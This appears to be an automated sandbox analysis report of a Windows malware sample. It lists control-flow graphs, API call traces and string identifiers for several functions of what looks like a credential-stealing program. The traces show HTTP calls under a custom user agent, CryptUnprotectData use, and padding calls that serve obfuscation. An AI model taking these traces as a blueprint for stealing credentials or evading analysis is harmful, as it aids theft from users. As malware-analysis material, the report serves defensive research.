                                                                control_flow_graph 860 40af5d-40afa2 LocalAlloc 863 40b3d3 860->863 864 40afa8-40afaf 860->864 865 40b3d5-40b3d9 863->865 864->863 866 40afb5-40afb9 864->866 866->863 867 40afbf-40afc4 866->867 867->863 868 40afca-40affa 867->868 870 40b039-40b09c lstrlenW * 2 LocalFree 868->870 871 40affc-40b001 868->871 882 40b0be-40b0d7 InternetOpenW 870->882 883 40b09e-40b0b8 870->883 872 40b004-40b00a 871->872 873 40b010-40b012 872->873 874 40b00c-40b00e 872->874 877 40b014-40b01b 873->877 878 40b01d-40b020 873->878 876 40b023-40b034 874->876 876->872 879 40b036 876->879 877->876 878->876 879->870 884 40b2a9-40b2f0 LocalAlloc SetEnvironmentVariableA LocalFree CreateWaitableTimerA SetEnvironmentVariableA 882->884 885 40b0dd-40b0f9 InternetConnectW 882->885 883->863 883->882 889 40b2f2-40b30e CancelWaitableTimer RegOpenKeyExA 884->889 890 40b314-40b376 CreateSemaphoreA ReleaseSemaphore CreateEventA SetEvent ResetEvent MultiByteToWideChar 884->890 887 40b2a2-40b2a3 InternetCloseHandle 885->887 888 40b0ff-40b131 HttpOpenRequestW 885->888 887->884 891 40b137-40b15f HttpSendRequestW 888->891 892 40b299-40b29c InternetCloseHandle 888->892 889->890 895 40b3b3 890->895 896 40b378-40b3b1 MultiByteToWideChar 890->896 900 40b165-40b21e LocalAlloc SetEnvironmentVariableA LocalFree RegOpenKeyExA CreateSemaphoreA ReleaseSemaphore OutputDebugStringA CreateFileMappingW FindCloseChangeNotification GetLastError CreateWaitableTimerA CancelWaitableTimer OutputDebugStringA CreateWaitableTimerA 891->900 901 40b28f-40b296 InternetCloseHandle 891->901 892->887 897 40b3b6-40b3d1 LocalFree * 3 895->897 896->897 897->865 902 40b220-40b242 CancelWaitableTimer RegOpenKeyExA 900->902 903 40b244 GetLastError 900->903 901->892 905 40b24a-40b270 CreateEventA SetEvent ResetEvent 902->905 903->905 906 40b27d-40b28d InternetReadFile 905->906 906->901 907 40b272-40b277 906->907 907->901 908 40b279 907->908 908->906
                                                                APIs
                                                                • LocalAlloc.KERNEL32(00000040,0000C350,74E04B60,00000000,74DE9350,?,?), ref: 0040AF78
                                                                • lstrlenW.KERNEL32(?), ref: 0040B042
                                                                • lstrlenW.KERNEL32(?), ref: 0040B049
                                                                • LocalFree.KERNEL32(?), ref: 0040B067
                                                                • InternetOpenW.WININET(MrBidenNeverKnow,00000000,00000000,00000000,00000000), ref: 0040B0CE
                                                                • InternetConnectW.WININET(00000000,?,00000000,00000000,00000000,00000003,00000000,00000001), ref: 0040B0F0
                                                                • HttpOpenRequestW.WININET(00000000,?,00000000,00000000,?,00400000,00000001), ref: 0040B12B
                                                                • HttpSendRequestW.WININET(00000000,00000000,00000000), ref: 0040B15B
                                                                • LocalAlloc.KERNEL32(00000000,00000C10), ref: 0040B16C
                                                                • SetEnvironmentVariableA.KERNEL32(ort9hkq1,b12x9vew), ref: 0040B17E
                                                                • LocalFree.KERNEL32(00000000), ref: 0040B185
                                                                • RegOpenKeyExA.ADVAPI32(80000001,regp8tb0054,00000000,00020019,00000073), ref: 0040B1A0
                                                                • CreateSemaphoreA.KERNEL32(00000000,00000000,00000001,XMLvotntp4p), ref: 0040B1B1
                                                                • ReleaseSemaphore.KERNEL32(00000000,00000001,00000000), ref: 0040B1BC
                                                                • OutputDebugStringA.KERNEL32(tswncgxtb), ref: 0040B1CD
                                                                • CreateFileMappingW.KERNELBASE(000000FF,00000000,00000004,00000000,00000C7C,00000000), ref: 0040B1DD
                                                                • FindCloseChangeNotification.KERNEL32(00000000), ref: 0040B1E4
                                                                • GetLastError.KERNEL32 ref: 0040B1EA
                                                                • CreateWaitableTimerA.KERNEL32(00000000,00000001,WTMR_rgj27qnx), ref: 0040B1F9
                                                                • CancelWaitableTimer.KERNEL32(00000000), ref: 0040B200
                                                                • OutputDebugStringA.KERNEL32(t0dqltc27), ref: 0040B20B
                                                                • CreateWaitableTimerA.KERNEL32(00000000,00000001,WTMR_yii8umeo), ref: 0040B216
                                                                • CancelWaitableTimer.KERNEL32(00000000), ref: 0040B221
                                                                • RegOpenKeyExA.ADVAPI32(80000001,reg0kv5a3vl,00000000,00020019,?), ref: 0040B23C
                                                                • GetLastError.KERNEL32 ref: 0040B244
                                                                • CreateEventA.KERNEL32(00000000,00000001,00000000,ev_ark30ypg), ref: 0040B255
                                                                • SetEvent.KERNEL32(00000000), ref: 0040B25E
                                                                • ResetEvent.KERNEL32(00000000), ref: 0040B265
                                                                • InternetReadFile.WININET(00000000,00000000,0000C350,?), ref: 0040B289
                                                                • InternetCloseHandle.WININET(00000000), ref: 0040B290
                                                                • InternetCloseHandle.WININET(?), ref: 0040B29C
                                                                • InternetCloseHandle.WININET(00000000), ref: 0040B2A3
                                                                • LocalAlloc.KERNEL32(00000000,00000833), ref: 0040B2B0
                                                                • SetEnvironmentVariableA.KERNEL32(f145t4tc,omgq2nzb), ref: 0040B2C8
                                                                • LocalFree.KERNEL32(00000000), ref: 0040B2CB
                                                                • CreateWaitableTimerA.KERNEL32(00000000,00000001,WTMR_rl53dosl), ref: 0040B2DA
                                                                • SetEnvironmentVariableA.KERNEL32(ro9h4ava,40da1v7y), ref: 0040B2EC
                                                                • CancelWaitableTimer.KERNEL32(00000000), ref: 0040B2F3
                                                                • RegOpenKeyExA.ADVAPI32(80000001,regvkrmlxvn,00000000,00020019,?), ref: 0040B30E
                                                                • CreateSemaphoreA.KERNEL32(00000000,00000000,00000001,XMLzziqpor8), ref: 0040B31F
                                                                • ReleaseSemaphore.KERNEL32(00000000,00000001,00000000), ref: 0040B32A
                                                                • CreateEventA.KERNEL32(00000000,00000001,00000000,ev_k42qply2), ref: 0040B33B
                                                                • SetEvent.KERNEL32(00000000), ref: 0040B344
                                                                • ResetEvent.KERNEL32(00000000), ref: 0040B34B
                                                                • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00000000,00000001), ref: 0040B36D
                                                                • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00000000,00000001), ref: 0040B3A5
                                                                • LocalFree.KERNEL32(?), ref: 0040B3B9
                                                                • LocalFree.KERNEL32(?), ref: 0040B3C2
                                                                • LocalFree.KERNELBASE(00000000), ref: 0040B3C9
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.2889570159.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Local$Create$EventFreeInternetTimerWaitable$Open$CloseSemaphore$AllocCancelEnvironmentHandleVariable$ByteCharDebugErrorFileHttpLastMultiOutputReleaseRequestResetStringWidelstrlen$ChangeConnectFindMappingNotificationReadSend
                                                                • String ID: 40da1v7y$MrBidenNeverKnow$WTMR_rgj27qnx$WTMR_rl53dosl$WTMR_yii8umeo$XMLvotntp4p$XMLzziqpor8$b12x9vew$ev_ark30ypg$ev_k42qply2$f145t4tc$omgq2nzb$ort9hkq1$reg0kv5a3vl$regp8tb0054$regvkrmlxvn$ro9h4ava$s$t0dqltc27$tswncgxtb
                                                                • API String ID: 1022627459-3553686633
                                                                • Opcode ID: 14ee274e78c0766a4cd5864c7accac75dcf6b01dfd21713871be93aec12028cd
                                                                • Instruction ID: aabe3de674458c1b7cd9436828d8e41c641cc014c7d9d3ac54ea3e037c4b33dd
                                                                • Opcode Fuzzy Hash: 14ee274e78c0766a4cd5864c7accac75dcf6b01dfd21713871be93aec12028cd
                                                                • Instruction Fuzzy Hash: 5BD15075A40215FFEB109BA4DC49FEE7BB4EB48701F108026FA05B72E0D7B859418BAD
                                                                Function 00401C5E Relevance: 65.4, APIs: 43, Instructions: 886memorystringCOMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 1007 401c5e-401cd6 1012 401ce8-401cfc call 40e179 1007->1012 1013 401cd8-401ce3 PathCombineW 1007->1013 1020 401d02-401dd4 call 401acc 1012->1020 1021 40271e-402722 1012->1021 1014 402163-402166 1013->1014 1015 402169-402193 1014->1015 1024 402195-4021a5 1015->1024 1025 4021a7-4021b2 wsprintfW 1015->1025 1054 402121-40215a LocalFree * 6 1020->1054 1055 401dda-401e45 call 402723 call 402c05 call 4036b6 call 40318a lstrlenW * 2 1020->1055 1026 4021b5-4021c9 PathCombineW call 40e179 1024->1026 1025->1026 1032 4026d5-4026e1 LocalFree 1026->1032 1033 4021cf-4022f8 LocalAlloc * 5 call 401acc call 402723 call 402c05 call 4036b6 call 40318a call 4044bb lstrlenW * 2 1026->1033 1034 4026e3-4026e4 LocalFree 1032->1034 1035 4026ea-4026f1 1032->1035 1065 402365-402368 1033->1065 1066 4022fa-40233c call 40f012 * 6 1033->1066 1034->1035 1035->1015 1038 4026f7-40271b LocalFree * 4 1035->1038 1038->1021 1054->1014 1057 40215c-40215d LocalFree 1054->1057 1083 401ea0-401ebb lstrlenW * 2 1055->1083 1084 401e47-401e99 call 40f012 * 5 1055->1084 1057->1014 1069 40236b-402386 lstrlenW * 2 1065->1069 1135 402341-402363 1066->1135 1072 402388-4023f9 call 40f012 * 6 1069->1072 1073 4023fb-4023fe 1069->1073 1076 402401-402411 1072->1076 1073->1076 1091 402413-40247a call 40f012 * 6 1076->1091 1092 40247e-40248a 1076->1092 1088 401f20-401f23 1083->1088 1089 401ebd-401f1e call 40f012 * 5 1083->1089 1084->1083 1095 401f26-401f36 1088->1095 1089->1095 1091->1092 1111 4024fb-40250b 1092->1111 1112 40248c-4024cb call 40f012 * 6 1092->1112 1117 401f93-401f9f 1095->1117 1118 401f38-401f8f call 40f012 * 5 1095->1118 1137 402579 1111->1137 1138 40250d-402577 call 40f012 * 6 1111->1138 1204 4024d0-4024f8 1112->1204 1142 401fa1-401ff4 call 40f012 * 5 1117->1142 1143 401ff8-402027 call 403e9f call 4041ad 1117->1143 1118->1117 1135->1069 1147 40257c-4025a9 call 403e9f call 4041ad 1137->1147 1138->1147 1142->1143 1186 402033-4020bd call 40de71 call 40f012 call 40bc7d 1143->1186 1187 402029-40202d 1143->1187 1183 4025b4-40263c call 40de71 call 40f012 call 40bc7d 1147->1183 1184 4025ab-4025ae 1147->1184 1231 402679-402693 LocalFree * 4 1183->1231 1232 40263e-402656 1183->1232 1184->1183 1193 402699-4026d2 LocalFree * 6 1184->1193 1233 4020fc 1186->1233 1234 4020bf-4020da 1186->1234 1187->1054 1187->1186 1193->1032 1204->1111 1231->1193 1232->1231 1238 402658-402671 call 40b3da 1232->1238 1235 4020ff-40211b LocalFree * 4 1233->1235 1234->1235 1239 4020dc-4020fa call 40b3da 1234->1239 1235->1054 1242 402676 1238->1242 1239->1235 1242->1231
                                                                APIs
                                                                • PathCombineW.SHLWAPI(00000000,00000000,?), ref: 00401CDD
                                                                • wsprintfW.USER32 ref: 004021AC
                                                                • PathCombineW.SHLWAPI(00000000,?,00000000), ref: 004021BA
                                                                • LocalAlloc.KERNEL32(00000040,00200000), ref: 004021DD
                                                                • LocalAlloc.KERNEL32(00000040,00200000), ref: 004021ED
                                                                • LocalAlloc.KERNEL32(00000040,00800000), ref: 004021FD
                                                                • LocalAlloc.KERNEL32(00000040,00800000), ref: 0040220D
                                                                • LocalAlloc.KERNEL32(00000040,00400000), ref: 0040221D
                                                                  • Part of subcall function 004044BB: LocalFree.KERNEL32(00000000), ref: 00404548
                                                                  • Part of subcall function 004044BB: CryptUnprotectData.CRYPT32(00000200,00000000,00000000,00000000,00000000,00000000,?), ref: 00404566
                                                                  • Part of subcall function 004044BB: LocalFree.KERNEL32(00000000), ref: 00404597
                                                                  • Part of subcall function 004044BB: LocalFree.KERNEL32(00000000), ref: 004045A6
                                                                  • Part of subcall function 004044BB: LocalFree.KERNEL32(00000000), ref: 004045B5
                                                                  • Part of subcall function 004044BB: LocalFree.KERNEL32(00000000), ref: 004045C0
                                                                  • Part of subcall function 004044BB: LocalFree.KERNEL32(00000000), ref: 004045CB
                                                                • lstrlenW.KERNEL32 ref: 004022DD
                                                                • lstrlenW.KERNEL32(?), ref: 004022E8
                                                                • lstrlenW.KERNEL32 ref: 00402377
                                                                • lstrlenW.KERNEL32(?), ref: 00402382
                                                                  • Part of subcall function 0040F012: lstrlenW.KERNEL32(?,00000000,?,74DF2F20), ref: 0040F02F
                                                                  • Part of subcall function 0040F012: lstrlenW.KERNEL32(00000000,?,00000000,?,74DF2F20), ref: 0040F034
                                                                  • Part of subcall function 0040F012: LocalAlloc.KERNEL32(00000040,00000000,?,00000000,?,74DF2F20), ref: 0040F04D
                                                                  • Part of subcall function 0040F012: CreateFileMappingW.KERNELBASE(000000FF,00000000,00000004,00000000,00000A28,00000000,?,?,00000000,?,74DF2F20), ref: 0040F06C
                                                                  • Part of subcall function 0040F012: FindCloseChangeNotification.KERNEL32(00000000,?,00000000,?,74DF2F20), ref: 0040F073
                                                                  • Part of subcall function 0040F012: LocalAlloc.KERNEL32(00000000,000005DD,?,00000000,?,74DF2F20), ref: 0040F07F
                                                                  • Part of subcall function 0040F012: GetLastError.KERNEL32(?,00000000,?,74DF2F20), ref: 0040F08D
                                                                  • Part of subcall function 0040F012: LocalFree.KERNEL32(00000000,?,00000000,?,74DF2F20), ref: 0040F090
                                                                  • Part of subcall function 0040F012: CreateWaitableTimerA.KERNEL32(00000000,00000001,WTMR_pg3esy2g), ref: 0040F09E
                                                                  • Part of subcall function 0040F012: CancelWaitableTimer.KERNEL32(00000000,?,00000000,?,74DF2F20), ref: 0040F0A5
                                                                  • Part of subcall function 0040F012: OutputDebugStringA.KERNELBASE(t26t01mzg,?,00000000,?,74DF2F20), ref: 0040F0B6
                                                                  • Part of subcall function 0040F012: CreateEventA.KERNEL32(00000000,00000001,00000000,ev_n39w6qzp,?,00000000,?,74DF2F20), ref: 0040F0C3
                                                                  • Part of subcall function 0040F012: SetEvent.KERNEL32(00000000,?,00000000,?,74DF2F20), ref: 0040F0CC
                                                                  • Part of subcall function 0040F012: ResetEvent.KERNEL32(00000000,?,00000000,?,74DF2F20), ref: 0040F0D3
                                                                  • Part of subcall function 0040F012: CreateMutexA.KERNEL32(00000000,00000000,MTXid6eg7kl,?,00000000,?,74DF2F20), ref: 0040F0E2
                                                                  • Part of subcall function 0040F012: SetEnvironmentVariableA.KERNEL32(kswx2kex,87xo3fjd,?,00000000,?,74DF2F20), ref: 0040F0FF
                                                                  • Part of subcall function 0040F012: ReleaseMutex.KERNEL32(?,?,00000000,?,74DF2F20), ref: 0040F104
                                                                  • Part of subcall function 0040F012: SetEnvironmentVariableA.KERNEL32(mjtppkej,54dhluqg,?,00000000,?,74DF2F20), ref: 0040F114
                                                                  • Part of subcall function 0040F012: CreateWaitableTimerA.KERNEL32(00000000,00000001,WTMR_b67hznar), ref: 0040F131
                                                                  • Part of subcall function 0040F012: GetLastError.KERNEL32(?,00000000,?,74DF2F20), ref: 0040F139
                                                                  • Part of subcall function 0040F012: CancelWaitableTimer.KERNEL32(00000000,?,00000000,?,74DF2F20), ref: 0040F140
                                                                  • Part of subcall function 0040F012: OutputDebugStringA.KERNEL32(t7fwgbo5x,?,00000000,?,74DF2F20), ref: 0040F14B
                                                                  • Part of subcall function 0040F012: GetLastError.KERNEL32(?,00000000,?,74DF2F20), ref: 0040F118
                                                                  • Part of subcall function 0040F012: GetLastError.KERNEL32(?,00000000,?,74DF2F20), ref: 0040F150
                                                                  • Part of subcall function 0040F012: CreateFileMappingW.KERNELBASE(000000FF,00000000,00000004,00000000,000005D6,00000000,?,00000000,?,74DF2F20), ref: 0040F165
                                                                  • Part of subcall function 0040F012: FindCloseChangeNotification.KERNEL32(00000000,?,00000000,?,74DF2F20), ref: 0040F16C
                                                                  • Part of subcall function 0040F012: OutputDebugStringA.KERNEL32(tv49i65z7,?,00000000,?,74DF2F20), ref: 0040F177
                                                                  • Part of subcall function 0040F012: FindFirstFileA.KERNEL32(s_t4ckbkwe,?,?,00000000,?,74DF2F20), ref: 0040F185
                                                                  • Part of subcall function 0040F012: FindClose.KERNEL32(00000000,?,00000000,?,74DF2F20), ref: 0040F18C
                                                                  • Part of subcall function 0040F012: CreateSemaphoreA.KERNEL32(00000000,00000000,00000001,SMPHR_qjkqlbwl), ref: 0040F1A1
                                                                  • Part of subcall function 0040F012: OutputDebugStringA.KERNELBASE(t9kx5wueg,?,00000000,?,74DF2F20), ref: 0040F1AA
                                                                  • Part of subcall function 0040F012: ReleaseSemaphore.KERNEL32(00000000,00000001,00000000,?,00000000,?,74DF2F20), ref: 0040F1B7
                                                                  • Part of subcall function 0040F012: SetEnvironmentVariableA.KERNEL32(b4j4f6xx,jcezxitk,?,00000000,?,74DF2F20), ref: 0040F1C7
                                                                  • Part of subcall function 0040F012: CreateSemaphoreA.KERNEL32(00000000,00000000,00000001,XMLamfolgz0), ref: 0040F1D8
                                                                  • Part of subcall function 0040F012: ReleaseSemaphore.KERNEL32(00000000,00000001,00000000,?,00000000,?,74DF2F20), ref: 0040F1E0
                                                                  • Part of subcall function 0040F012: OutputDebugStringA.KERNEL32(t1v6z4di9,?,00000000,?,74DF2F20), ref: 0040F1E7
                                                                  • Part of subcall function 0040F012: CreateMutexA.KERNEL32(00000000,00000000,MTXdxglk35i,?,00000000,?,74DF2F20), ref: 0040F1F0
                                                                  • Part of subcall function 0040F012: ReleaseMutex.KERNEL32(00000000,?,00000000,?,74DF2F20), ref: 0040F1FB
                                                                  • Part of subcall function 0040F012: LocalAlloc.KERNEL32(00000000,00000461,?,00000000,?,74DF2F20), ref: 0040F223
                                                                  • Part of subcall function 0040F012: GlobalFree.KERNEL32(?), ref: 0040F22C
                                                                  • Part of subcall function 0040F012: RegOpenKeyExA.ADVAPI32(80000001,regwog66qaw,00000000,00020019,?,?,00000000,?,74DF2F20), ref: 0040F217
                                                                • LocalFree.KERNEL32(00000000), ref: 0040267A
                                                                • LocalFree.KERNEL32(?), ref: 00402683
                                                                • LocalFree.KERNEL32(?), ref: 0040268C
                                                                • LocalFree.KERNEL32(?), ref: 00402693
                                                                • LocalFree.KERNELBASE(?), ref: 0040269C
                                                                • LocalFree.KERNELBASE(?), ref: 004026A5
                                                                • LocalFree.KERNELBASE(00000000), ref: 004026AE
                                                                • LocalFree.KERNELBASE(?), ref: 004026B7
                                                                • LocalFree.KERNEL32(00000000), ref: 004026C0
                                                                • LocalFree.KERNEL32(?), ref: 004026C9
                                                                • LocalFree.KERNEL32(00000000), ref: 004026D6
                                                                • LocalFree.KERNEL32(?), ref: 004026E4
                                                                • LocalFree.KERNEL32(00000000), ref: 004026F8
                                                                • LocalFree.KERNEL32(?), ref: 00402702
                                                                • LocalFree.KERNEL32(?), ref: 0040270B
                                                                • LocalFree.KERNEL32(?), ref: 00402715
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.2889570159.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Local$Free$Create$Alloc$lstrlen$DebugOutputString$ErrorFindLastMutexReleaseSemaphoreTimerWaitable$CloseEnvironmentEventFileVariable$CancelChangeCombineMappingNotificationPath$CryptDataFirstGlobalOpenResetUnprotectwsprintf
                                                                • String ID:
                                                                • API String ID: 534612412-0
                                                                • Opcode ID: 99538e4c23dba4fe0e8800e6204ac5245bae841512873a1d92653ab50f732e88
                                                                • Instruction ID: 7598cb2e0b1923c2f9d0ef1dd6de92bee2b742caeb08b6a75bd043d3e79ad95d
                                                                • Opcode Fuzzy Hash: 99538e4c23dba4fe0e8800e6204ac5245bae841512873a1d92653ab50f732e88
                                                                • Instruction Fuzzy Hash: A3722771E00609EFCB10DFE5DC45AEEBBB5BB88304F10817AE915B7391DB7899019B98
                                                                Function 0040DFF8 Relevance: 59.6, APIs: 23, Strings: 11, Instructions: 133synchronizationregistrymemoryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • CreateSemaphoreA.KERNEL32(00000000,00000000,00000001,SMPHR_lsu5ct24), ref: 0040E00E
                                                                • SetEnvironmentVariableA.KERNEL32(90qhk0la,gcxcekb0), ref: 0040E026
                                                                • ReleaseSemaphore.KERNEL32(00000000,00000001,00000000), ref: 0040E02C
                                                                • RegOpenKeyExA.ADVAPI32(80000001,regyb7u5h3g,00000000,00020019,?), ref: 0040E04B
                                                                • CreateEventA.KERNEL32(00000000,00000001,00000000,ev_0cg1eief), ref: 0040E05B
                                                                • SetEvent.KERNEL32(00000000), ref: 0040E064
                                                                • ResetEvent.KERNEL32(00000000), ref: 0040E06B
                                                                • LocalAlloc.KERNEL32(00000000,00000F4A), ref: 0040E078
                                                                • SetEnvironmentVariableA.KERNEL32(qdicnr9r,3nwiu8k2), ref: 0040E08A
                                                                • LocalFree.KERNEL32(00000000), ref: 0040E08D
                                                                • OutputDebugStringA.KERNEL32(tf8mzzkut), ref: 0040E09E
                                                                • CreateMutexA.KERNEL32(00000000,00000000,MTXs0ri916b), ref: 0040E0A9
                                                                • OutputDebugStringA.KERNEL32(tugcgipbn), ref: 0040E0BA
                                                                • ReleaseMutex.KERNEL32(00000000), ref: 0040E0BD
                                                                • GetLastError.KERNEL32 ref: 0040E0C5
                                                                • CreateWaitableTimerA.KERNEL32(00000000,00000001,WTMR_0v14vxe0), ref: 0040E0D4
                                                                • GetCurrentProcess.KERNEL32(00000008,?), ref: 0040E0E9
                                                                • OpenProcessToken.ADVAPI32(00000000), ref: 0040E0F0
                                                                • GetTokenInformation.KERNELBASE(?,00000001,00000000,?,?), ref: 0040E107
                                                                • GetLastError.KERNEL32 ref: 0040E10D
                                                                • GetTokenInformation.KERNELBASE(?,00000001,00000000,?,?), ref: 0040E138
                                                                • lstrcmpiW.KERNEL32(?), ref: 0040E160
                                                                • GlobalFree.KERNEL32(00000000), ref: 0040E168
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.2889570159.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Create$EventToken$DebugEnvironmentErrorFreeInformationLastLocalMutexOpenOutputProcessReleaseSemaphoreStringVariable$AllocCurrentGlobalResetTimerWaitablelstrcmpi
                                                                • String ID: 3nwiu8k2$90qhk0la$MTXs0ri916b$SMPHR_lsu5ct24$WTMR_0v14vxe0$ev_0cg1eief$gcxcekb0$qdicnr9r$regyb7u5h3g$tf8mzzkut$tugcgipbn
                                                                • API String ID: 1996575405-4192329849
                                                                • Opcode ID: 84826d7ce7ec4e16c5f4bd58609b17f49f724890782c6bcfa681018ba10ebfc6
                                                                • Instruction ID: 7168791fe35a70627c961e9e90ef7ec4f5f8b875fdf92052aaea41076284f879
                                                                • Opcode Fuzzy Hash: 84826d7ce7ec4e16c5f4bd58609b17f49f724890782c6bcfa681018ba10ebfc6
                                                                • Instruction Fuzzy Hash: 1E417036A40215FFD7109FE19D49FDA3F78EB49B41F108476F601B21A0D6789A408BA8
                                                                Function 0040DED0 Relevance: 57.9, APIs: 20, Strings: 13, Instructions: 105timeregistrymemoryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • CreateSemaphoreA.KERNEL32(00000000,00000000,00000001,SMPHR_mrotc31v), ref: 0040DEE3
                                                                • OutputDebugStringA.KERNEL32(txyxulc7k,?,?,?,00409D36), ref: 0040DEF6
                                                                • ReleaseSemaphore.KERNEL32(00000000,00000001,00000000,?,?,?,00409D36), ref: 0040DEFC
                                                                • RegOpenKeyExA.KERNEL32(80000001,regez2y9jfa,00000000,00020019,?,?,?,?,00409D36), ref: 0040DF21
                                                                • OutputDebugStringA.KERNEL32(tgfs7wgt3,?,?,?,00409D36), ref: 0040DF2A
                                                                • CreateEventA.KERNEL32(00000000,00000001,00000000,ev_6ltrvjqq,?,?,?,00409D36), ref: 0040DF37
                                                                • SetEvent.KERNEL32(00000000,?,?,?,00409D36), ref: 0040DF40
                                                                • ResetEvent.KERNEL32(00000000,?,?,?,00409D36), ref: 0040DF47
                                                                • CreateWaitableTimerA.KERNEL32(00000000,00000001,WTMR_zqpogtvp), ref: 0040DF56
                                                                • RegOpenKeyExA.KERNEL32(80000001,regl5f123p6,00000000,00020019,?,?,?,?,00409D36), ref: 0040DF73
                                                                • CancelWaitableTimer.KERNEL32(00000000,?,?,?,00409D36), ref: 0040DF80
                                                                • OutputDebugStringA.KERNEL32(tcdimqv7r,?,?,?,00409D36), ref: 0040DF89
                                                                • CreateWaitableTimerA.KERNEL32(00000000,00000001,WTMR_7t7rrqol), ref: 0040DF94
                                                                • OutputDebugStringA.KERNEL32(txuqs45db,?,?,?,00409D36), ref: 0040DFA1
                                                                • CancelWaitableTimer.KERNEL32(00000000,?,?,?,00409D36), ref: 0040DFA4
                                                                • OutputDebugStringA.KERNEL32(thtujb8qu,?,?,?,00409D36), ref: 0040DFAB
                                                                • LocalAlloc.KERNEL32(00000000,000009B1,?,?,?,00409D36), ref: 0040DFB5
                                                                • OutputDebugStringA.KERNEL32(tt163rq13,?,?,?,00409D36), ref: 0040DFC2
                                                                • LocalFree.KERNEL32(00000000,?,?,?,00409D36), ref: 0040DFC5
                                                                • CreateMutexW.KERNEL32(00000000,00000000,stasvasbas,?,?,?,00409D36), ref: 0040DFE6
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.2889570159.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: DebugOutputString$Create$TimerWaitable$Event$CancelLocalOpenSemaphore$AllocFreeMutexReleaseReset
                                                                • String ID: SMPHR_mrotc31v$WTMR_7t7rrqol$WTMR_zqpogtvp$ev_6ltrvjqq$regez2y9jfa$regl5f123p6$stasvasbas$tcdimqv7r$tgfs7wgt3$thtujb8qu$tt163rq13$txuqs45db$txyxulc7k
                                                                • API String ID: 1152674414-3755437473
                                                                • Opcode ID: 504f97075363ed1f6cdb6da0dad17a3ce4cb5d842dc6b9c9f596395956721023
                                                                • Instruction ID: 3a69443e8b0ce763214c634665d92984800993c347feead3620fa9dc3b437091
                                                                • Opcode Fuzzy Hash: 504f97075363ed1f6cdb6da0dad17a3ce4cb5d842dc6b9c9f596395956721023
                                                                • Instruction Fuzzy Hash: 83219935B843547FE6206BA05C8AFEB3D5CDB48B96F114032FB05B51D2E6E89D80857D
                                                                Function 00408DB2 Relevance: 42.4, APIs: 23, Strings: 1, Instructions: 420fileCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                  • Part of subcall function 0040F788: LocalAlloc.KERNEL32(00000000,0000026E,00000000,?,0000020A), ref: 0040F79F
                                                                  • Part of subcall function 0040F788: GetLastError.KERNEL32 ref: 0040F7AD
                                                                  • Part of subcall function 0040F788: LocalFree.KERNEL32(00000000), ref: 0040F7B0
                                                                  • Part of subcall function 0040F788: RegOpenKeyExA.ADVAPI32(80000001,regnzv4wvxn,00000000,00020019,?), ref: 0040F7CA
                                                                  • Part of subcall function 0040F788: CreateEventA.KERNEL32(00000000,00000001,00000000,ev_v4tqtxno), ref: 0040F7D9
                                                                  • Part of subcall function 0040F788: SetEvent.KERNEL32(00000000), ref: 0040F7E2
                                                                  • Part of subcall function 0040F788: ResetEvent.KERNEL32(00000000), ref: 0040F7E9
                                                                  • Part of subcall function 0040F788: CreateWaitableTimerA.KERNEL32(00000000,00000001,WTMR_8zhp33zt), ref: 0040F7F7
                                                                  • Part of subcall function 0040F788: CancelWaitableTimer.KERNEL32(00000000), ref: 0040F808
                                                                  • Part of subcall function 0040F788: OutputDebugStringA.KERNEL32(ttorgxv5m), ref: 0040F81C
                                                                  • Part of subcall function 0040F788: CreateSemaphoreA.KERNEL32(00000000,00000000,00000001,XMLf91r4xcv), ref: 0040F829
                                                                  • Part of subcall function 0040F788: ReleaseSemaphore.KERNEL32(00000000,00000001,00000000), ref: 0040F834
                                                                  • Part of subcall function 0040F788: CreateMutexA.KERNEL32(00000000,00000000,MTX5u8ptwy0), ref: 0040F843
                                                                  • Part of subcall function 0040F788: SetEnvironmentVariableA.KERNEL32(nhy1vzmm,wfy3i05h), ref: 0040F85A
                                                                  • Part of subcall function 0040F788: ReleaseMutex.KERNEL32(00410AB3), ref: 0040F863
                                                                  • Part of subcall function 0040F788: OutputDebugStringA.KERNEL32(t1pi8p487), ref: 0040F86E
                                                                  • Part of subcall function 0040F788: CreateWaitableTimerA.KERNEL32(00000000,00000001,WTMR_fgohzvee), ref: 0040F879
                                                                  • Part of subcall function 0040F788: CancelWaitableTimer.KERNEL32(00000000), ref: 0040F880
                                                                  • Part of subcall function 0040F788: GetLastError.KERNEL32 ref: 0040F882
                                                                  • Part of subcall function 0040F788: CreateFileMappingW.KERNELBASE(000000FF,00000000,00000004,00000000,00000A8C,00000000), ref: 0040F892
                                                                  • Part of subcall function 0040F788: RegOpenKeyExA.ADVAPI32(80000001,regr3z819eq,00000000,00020019,?), ref: 0040F8AF
                                                                  • Part of subcall function 0040F788: CloseHandle.KERNEL32(00000000), ref: 0040F8B6
                                                                  • Part of subcall function 0040F788: SetEnvironmentVariableA.KERNEL32(wem6yeez,xjah9ors), ref: 0040F8C6
                                                                • CopyFileW.KERNEL32(00000000,?,00000000), ref: 00408E4B
                                                                • LocalFree.KERNEL32(?), ref: 00408EF3
